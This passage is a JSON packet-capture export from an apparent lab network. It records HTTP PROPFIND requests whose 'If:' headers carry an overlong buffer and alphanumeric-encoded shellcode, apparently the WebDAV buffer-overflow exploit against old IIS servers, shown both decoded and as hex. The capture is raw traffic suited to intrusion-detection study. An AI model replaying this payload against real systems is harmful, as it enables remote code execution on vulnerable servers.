||
"tcp.options.timestamp.tsval": "2309868663",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000470000",
|
||
"tcp.analysis.bytes_in_flight": "1667",
|
||
"tcp.analysis.push_bytes_sent": "1667"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000693000",
|
||
"tcp.time_delta": "0.000007000"
|
||
},
|
||
"tcp.payload": "48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "459",
|
||
"tcp.segment": "460",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1667",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:43:52:68:43:79:54:4b:7a:6c:50:66:73:4e:64:64:43:5a:79:78:57:50:66:44:4d:73:6f:61:6e:6e:72:78:54:6a:4f:61:51:54:49:77:7a:57:46:51:66:73:41:41:4b:6d:46:66:44:6f:4c:50:45:64:6d:54:75:52:4b:6b:59:4d:63:6f:63:47:41:4a:58:71:48:70:47:78:61:e7:91:8f:e4:89:b3:e4:b9:8f:e5:91:a4:e6:a5:a3:e7:a9:a3:e6:bd:ba:e4:a5:83:e6:9d:99:e6:99:a5:e4:b1:ab:e7:a5:83:e6:8d:98:e5:a5:a3:e5:99:91:e5:99:b6:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:b9:a9:e5:89:90:e6:a1:b2:e6:99:a2:e4:bd:b6:e4:a5:96:e4:99:8f:e4:8d:8b:e6:8d:87:e6:85:a6:e6:89:ae:e7:9d:a8:e4:a9:86:e5:85:a1:e6:85:ac:e6:b9:af:e5:89:96:e5:91:b4:e4:a9:96:e4:8d:ad:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:61:69:47:70:66:46:63:51:52:6c:6f:50:43:5a:6f:4b:74:6b:43:4c:62:4a:56:78:65:48:76:44:59:6a:66:78:43:70:42:66:6b:4e:4b:73:41:42:55:59:57:73:46:6f:55:59:53:41:66:45:73:57:75:4f:45:4d:73:51:5a:79:63:41:51:74:43:49:71:5a:61:73:61:75:42:77:e7:a9:94:e6:a9:ad:e4:a9:97:e7:9d:8b:e4:9d:85:e5:91:90:e5:a9:8c:e7:89:b8:e4:99:94:e7:91:85:e6:85:81:e4:bd:a4:e7:9d:8f:e6:b5:9a:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:85:91:e5:89:95:e4:91:ad:e6:8d:8e:e1:8f:80:e6:a0:83:e6:b1:98:e5:a1:85:e5:95:92:e6:99:92:e4:a9:a8:e4:bd:a3:e7:a1:83:e5:a5:b9:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/CRhCyTKzlPfsNddCZyxWPfDMsoannrxTjOaQTIwzWFQfsAAKmFfDoLPEdmTuRKkYMcocGAJXqHpGxa<78><61><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/aiGpfFcQRloPCZoKtkCLbJVxeHvDYjfxCpBfkNKsABUYWsFoUYSAfEsWuOEMsQZycAQtCIqZasauBw<42><77><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "462"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.860233000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.860233000",
|
||
"frame.time_delta": "0.000068000",
|
||
"frame.time_delta_displayed": "0.004217000",
|
||
"frame.time_relative": "17.111173000",
|
||
"frame.number": "470",
|
||
"frame.len": "283",
|
||
"frame.cap_len": "283",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "269",
|
||
"ip.id": "0x0000be84",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x000071ff",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40863",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40863",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "69",
|
||
"tcp.len": "217",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "844536233",
|
||
"tcp.nxtseq": "1666",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3493368158",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x000029fe",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:7c:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:7c:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868668",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000345000",
|
||
"tcp.analysis.bytes_in_flight": "1665",
|
||
"tcp.analysis.push_bytes_sent": "1665"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000597000",
|
||
"tcp.time_delta": "0.000068000"
|
||
},
|
||
"tcp.payload": "39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "469",
|
||
"tcp.segment": "470",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1665",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:64:6b:4f:6f:55:51:6d:43:68:59:78:78:73:6c:56:66:59:75:4c:58:75:71:65:69:70:65:76:4b:66:75:45:4a:7a:48:75:45:51:79:73:61:46:6d:4d:41:76:71:4c:61:58:6f:77:6f:54:67:59:41:65:6a:6c:4f:5a:44:45:4b:72:70:78:65:71:48:47:49:77:76:62:76:59:e6:99:92:e7:a9:b9:e6:bd:88:e6:9d:98:e4:b5:81:e4:99:8e:e7:9d:af:e4:ad:b5:e5:a1:b3:e4:ad:b6:e6:85:b8:e4:bd:82:e7:a1:b1:e5:a9:9a:e7:81:a7:e7:99:86:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:9d:ae:e4:b1:8f:e7:95:b5:e7:91:a6:e4:8d:84:e6:b9:99:e6:b1:b1:e5:99:a5:e4:95:b6:e4:ad:a5:e4:9d:ae:e4:8d:8c:e5:89:ac:e4:ad:88:e6:b9:98:e4:85:a5:e4:b9:87:e4:a5:96:e6:85:b0:e6:9d:a1:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:51:63:66:43:47:59:52:54:62:6d:47:53:6c:53:61:6f:63:6c:79:4b:51:78:6d:52:51:4c:4e:64:76:6d:61:44:44:77:41:73:70:79:48:50:46:6b:59:67:79:77:75:45:56:4f:52:6c:4e:4f:4a:75:69:72:73:68:6c:63:4b:63:4b:66:41:47:6c:46:41:6f:51:48:4a:71:73:e5:a5:96:e7:95:a7:e7:9d:a1:e4:a9:89:e7:81:af:e4:8d:90:e7:85:aa:e7:99:a7:e6:bd:a2:e5:95:91:e4:b1:81:e4:bd:ac:e7:81:a4:e4:91:a9:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:b5:83:e5:99:85:e6:99:98:e5:a9:96:e1:8f:80:e6:a0:83:e4:ad:87:e7:95:a1:e4:ad:81:e4